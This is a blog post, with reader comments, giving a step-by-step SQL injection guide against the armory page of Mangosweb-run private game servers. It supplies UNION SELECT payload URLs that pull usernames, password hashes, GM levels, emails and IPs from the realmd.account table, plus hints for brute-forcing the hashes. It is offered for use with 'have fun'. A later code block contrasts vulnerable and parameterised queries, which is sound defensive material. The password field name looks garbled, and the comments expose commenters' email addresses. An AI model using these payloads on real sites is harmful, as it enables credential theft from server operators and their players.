
This is not an in-game exploit. It can be used to steal usernames and passwords, even GM accounts. First of all, the following guide applies only to servers that use Mangosweb to run their homepage. This is a very popular site and many private servers run Mangosweb.

The vulnerability is in the armory. With an SQL injection we can extract passwords or other sensitive information. Access the site, for example:
www.target.domain/index.php

Replace:
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select 11,22,33,44–

If you see 11 on the resulting page, the following will work. If you don’t see anything, try changing char=1 to char=2 or any other number, until you find a character that doesn’t exist.

Now replace:
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select <field>,null,null,null from <database> where <condition>–

We will work with <database>=realmd.account

The <field> can be:

id – id of the account
username – name of the account
I – password of the account
gmlevel – 0,1,2 or 3 account level
email – the registration email
joindate – the date the account was made on
last_ip – the ip the user last time logged into the server
and others…

And the <condition> for example can look like this:
username=’admin’
gmlevel=3
id=5
gmlevel=2 and id<100
and other combinations.

So if you want to retrieve the password of the user john you will replace
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select I,null,null,null from realmd.account where username=’john’–

If everything went well you should see a 40-character password hash like this:
7e27e687f56923bec2ff792cbe983d8ff5c5fc10

This is the SHA-1 (160-bit) hash of the password. Presuming john’s password was “test”, the hash above resulted from JOHN:TEST. So you see, the hashed value also contains the username, separated from the password by “:”.

SHA1(CONCAT(UPPER('john'),':',UPPER('test'))) – this is the expression that produced 7e27e687f56923bec2ff792cbe983d8ff5c5fc10. Note the upper() function: it means that passwords are not case sensitive and are converted to uppercase at creation.

Because SHA-1 is one-way, you can’t reverse engineer it. You must brute-force it, using the prefix JOHN: . Also you must exclude lowercase characters while brute-forcing; use only 0-9, A-Z and perhaps special characters. Have fun. I will write a guide perhaps if you are interested… until then… try cracking it on your own.
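The defensive counterpart to the steps above, as an added example that is not part of the original post and is not Mangosweb's own code: a lookup that pastes the char value into the SQL text, next to a version that validates it as a numeric id and binds it as a parameter. The table layout, function names and sample rows are assumptions constructed for the demo, and SQLite stands in for the site's database.

```python
import sqlite3

def make_db():
    """Constructed stand-in data; the real Mangosweb schema is not shown on the page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE characters (guid INTEGER, name TEXT, race INTEGER, level INTEGER);
        CREATE TABLE account (id INTEGER, username TEXT, I TEXT, gmlevel INTEGER);
        INSERT INTO characters VALUES (1, 'Thrall', 2, 80);
        INSERT INTO account VALUES (5, 'JOHN', 'constructed-hash-value', 0);
    """)
    return db

def viewchar_vulnerable(db, char):
    # Assumed shape of the flaw: the raw char value is concatenated into the
    # statement, so anything after the number is parsed as SQL.
    sql = "SELECT name, race, level, guid FROM characters WHERE guid = " + char
    return db.execute(sql).fetchall()

def viewchar_hardened(db, char):
    # 1) Accept only a short, plain decimal id; reject everything else up front.
    if not (char.isascii() and char.isdigit() and len(char) <= 10):
        raise ValueError("char must be a numeric character id")
    # 2) Bind the value as a parameter so it can never alter the statement.
    sql = "SELECT name, race, level, guid FROM characters WHERE guid = ?"
    return db.execute(sql, (int(char),)).fetchall()

# Constructed input in the shape the guide describes (a UNION appended to char=).
PAYLOAD = "0 UNION SELECT I, NULL, NULL, NULL FROM account WHERE username = 'JOHN'"

def demo():
    db = make_db()
    leaked = viewchar_vulnerable(db, PAYLOAD)   # account data comes back
    try:
        viewchar_hardened(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True                          # rejected before reaching the DB
    normal = viewchar_hardened(db, "1")         # legitimate lookups still work
    return leaked, blocked, normal

if __name__ == "__main__":
    print(demo())
```

Running the web application under a database account that has no read access to the account table would also keep a flaw like this from reaching credentials.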

3 Comments so far »

  1. by alex, on July 27 2009 @ 3:09 am

     

    I've looked everywhere and cannot find a WoW private server using mangosweb, please help

  2. by hdrroba, on July 27 2009 @ 8:17 pm

     

    Hi WoW Booty Bay.
    Please help me, add hugomfold@hotmail.com, I urgently need to talk to you, please.

  3. by Levi, on November 23 2009 @ 8:20 pm

     

    I don't get it at all, help me, email me at Berogan2@yahoo.com
